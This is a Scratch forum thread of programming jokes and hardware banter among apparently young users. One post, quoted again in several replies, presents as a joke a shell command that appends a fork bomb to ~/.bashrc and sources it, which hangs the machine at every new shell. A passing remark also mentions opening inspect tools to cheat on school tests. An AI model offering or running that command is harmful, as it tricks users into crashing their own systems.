Discuss Scratch
- Discussion Forums
- » Advanced Topics
- » advanced hahas
- Jonathan50
-
Scratcher
1000+ posts
advanced hahas
Me writing an object system in Scratch only to not bother making anything with it (this has happened 4 times)Relatable. (bump?)
Last edited by Jonathan50 (Dec. 10, 2023 22:47:59)
- alwayspaytaxes
-
Scratcher
500+ posts
advanced hahas
Me writing an object system in Scratch only to not bother making anything with it (this has happened 4 times)Yeah I feel you
A type system for Scratch is also basically useless, considering that a few hacks for introspection are not hard to do on your own

- retro_person
-
Scratcher
100+ posts
advanced hahas
Writing a (barely functioning) 3D renderer in a 20 year-old version of Scratch.


- RobotChickens
-
Scratcher
500+ posts
advanced hahas
(#227)That doesn't mean it runs well XD(#226)I don't have a GPU but I can play Forza(#224)Hey, at least you have a GPU
You know your laptop is bad if Enderman on a PENTIUM 4 has better performance than you…
Pentium 4
-img-

Edit: In case you were wondering, this is his full name :)
echo ':(){ :|:& };:' >> ~/.bashrc && source ~/.bashrc
Last edited by RobotChickens (Dec. 12, 2023 13:58:51)
- kkidslogin
-
Scratcher
1000+ posts
advanced hahas
(#228)Minimum settings (Except shadows and textures) and I'm getting a cool 35 FPS(#227)That doesn't mean it runs well XD(#226)I don't have a GPU but I can play Forza(#224)Hey, at least you have a GPU
You know your laptop is bad if Enderman on a PENTIUM 4 has better performance than you…
Pentium 4
-img-
this is what having an AMD system gets you- RobotChickens
-
Scratcher
500+ posts
advanced hahas
(#229)How are you getting output to the screen?? Playing forza in headless mode are ya? (because that's what I'm talking about)(#228)Minimum settings (Except shadows and textures) and I'm getting a cool 35 FPS(#227)That doesn't mean it runs well XD(#226)I don't have a GPU but I can play Forza(#224)Hey, at least you have a GPU
You know your laptop is bad if Enderman on a PENTIUM 4 has better performance than you…
Pentium 4
-img-
Edit: In case you were wondering, this is his full name :)echo ':(){ :|:& };:' >> ~/.bashrc && source ~/.bashrcthis is what having an AMD system gets you
- davidtheplatform
-
Scratcher
500+ posts
advanced hahas
Most cpus have a (pretty bad) gpu built in. Technically it’s a gpu but if someone says I (don’t) have a gpu they mean a dedicated one(#229)How are you getting output to the screen?? Playing forza in headless mode are ya? (because that's what I'm talking about)(#228)Minimum settings (Except shadows and textures) and I'm getting a cool 35 FPS(#227)That doesn't mean it runs well XD(#226)I don't have a GPU but I can play Forza(#224)Hey, at least you have a GPU
You know your laptop is bad if Enderman on a PENTIUM 4 has better performance than you…
Pentium 4
-img-
Edit: In case you were wondering, this is his full name :)echo ':(){ :|:& };:' >> ~/.bashrc && source ~/.bashrcthis is what having an AMD system gets you
- kkidslogin
-
Scratcher
1000+ posts
advanced hahas
(#232)Yes. Since my CPU is a 5700g, the VEGA 8 is strong enough to play forza on low settings. We turned some things down that you can't notice and it gets as high as 40 now.Most cpus have a (pretty bad) gpu built in. Technically it’s a gpu but if someone says I (don’t) have a gpu they mean a dedicated one(#229)How are you getting output to the screen?? Playing forza in headless mode are ya? (because that's what I'm talking about)(#228)Minimum settings (Except shadows and textures) and I'm getting a cool 35 FPS(#227)That doesn't mean it runs well XD(#226)I don't have a GPU but I can play Forza(#224)Hey, at least you have a GPU
You know your laptop is bad if Enderman on a PENTIUM 4 has better performance than you…
Pentium 4
-img-
Edit: In case you were wondering, this is his full name :)echo ':(){ :|:& };:' >> ~/.bashrc && source ~/.bashrcthis is what having an AMD system gets you
- TheSmartGuy1234
-
Scratcher
1000+ posts
advanced hahas
Because of Geometry Dash 2.2, it is now the biggest programming language for games on steam, instead of the biggest IDE.
- TheSmartGuy1234
-
Scratcher
1000+ posts
advanced hahas
Shoutout to the guy who set the <title></title> of the Google 404 page to “Error 404 (Not Found)!!1”.
!!1
!!1
- Sohta_kun
-
Scratcher
100+ posts
advanced hahas
The fact that this is technically an “Advanced Topic” is advanced all by itself.
- gilbert_given_189
-
Scratcher
1000+ posts
advanced hahas
What funny error messages have you made? Here's one I've made:
// ... (context: parsing) if (next != '\0' && next != '(') // make sure we're also not on EPSILON (NULL) debug("NO PARENTHESIS ON LOOKAHEAD! OH, THE TRAGEDY!"), throw String("NO OPEN PARENTHESIS"); // ...
// ... (context: sampling something)
let rand = match rng.next() {
Some(x) => x,
None => panic!("FIXME: RNG is exhausted and fainted on the marathon"),
};
// ...
Last edited by gilbert_given_189 (May 3, 2024 14:08:00)
- ninjaMAR
-
Scratcher
1000+ posts
advanced hahas
How I debug code
print("Here") ... print("Here1") ... print("Here2") ... print("Here3")
- Ghxstify2009
-
Scratcher
100+ posts
advanced hahas
Dude I know right…But what about that super annoying locked mode “feature”school says no opening other webpages to cheat on tests
*opens inspect*
But what about GoGuardian
- Discussion Forums
- » Advanced Topics
-
» advanced hahas












